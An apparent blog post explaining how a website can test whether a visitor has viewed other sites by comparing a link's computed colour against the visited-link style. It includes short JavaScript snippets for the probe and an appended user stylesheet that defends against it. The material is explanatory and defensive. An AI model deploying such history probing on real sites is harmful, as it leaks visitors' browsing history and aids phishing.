Stealing browser history

Jeremiah Grossman has posted a fascinating demonstration of how a website can find out which other websites a particular visitor has viewed. (If you don’t see it: look at the “I know where you’ve been” section in the sidebar. Recognize any pages you’ve visited recently?)

The way it works is brilliantly simple. Suppose you want to check whether your visitor has recently visited www.tetromino.net/blog. To do so, in JavaScript, you create a link to the website in question:

var link = document.createElement("a");        // a link to the page being probed
link.id = "id_steal_the_history";
link.href = "http://www.tetromino.net/blog/";
link.innerHTML = "http://www.tetromino.net/blog/";
document.body.appendChild(link);               // must be in the document for styles to apply

You then check whether the link’s style matches the style for visited links in your stylesheet:

var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
if (color == "rgb(184, 91, 90)") {             // the colour this page's stylesheet gives a:visited
    // hack the gibson
}

And then you simply remove the link whose color you were testing:

document.body.removeChild(link);

Note that this method doesn’t give you the user’s browser history — it only allows you to test whether a given site is in the history or not. However, for many phishing applications, that would be quite enough. Unfortunately, I can’t think of any way to protect yourself from the attack besides setting a user stylesheet that displays visited and non-visited links in exactly the same style. And that would make the web an ugly, dreary place…
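The user stylesheet that last paragraph proposes, written out as an added example (it is not part of the original post): it pins visited and unvisited links to exactly the same appearance, so there is no visited style left for the computed-style check above to detect. The colour values are assumptions; the `!important` flags are needed because plain user-stylesheet rules lose to the site’s own rules, while user rules marked `!important` override them.

```css
/* Added example (not from the original post): a user stylesheet that
   gives visited and unvisited links exactly the same appearance, so a
   computed-style comparison cannot tell the two states apart.
   The colour values are assumptions, not taken from the page. */

a:link,
a:visited {
  /* Pin every property a site might vary between the two states. */
  color: #1a4f8a !important;
  background-color: transparent !important;
  text-decoration: underline !important;
  border-color: #1a4f8a !important;
  outline-color: #1a4f8a !important;
}

/* Hover and focus styles may still differ: they depend on the pointer
   and keyboard, not on browsing history, so they reveal nothing. */
a:hover,
a:focus {
  color: #c0392b !important;
}
```

In Firefox this goes in the profile’s userContent.css; current browsers additionally restrict which properties `:visited` may change and make getComputedStyle report the unvisited style regardless of history.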
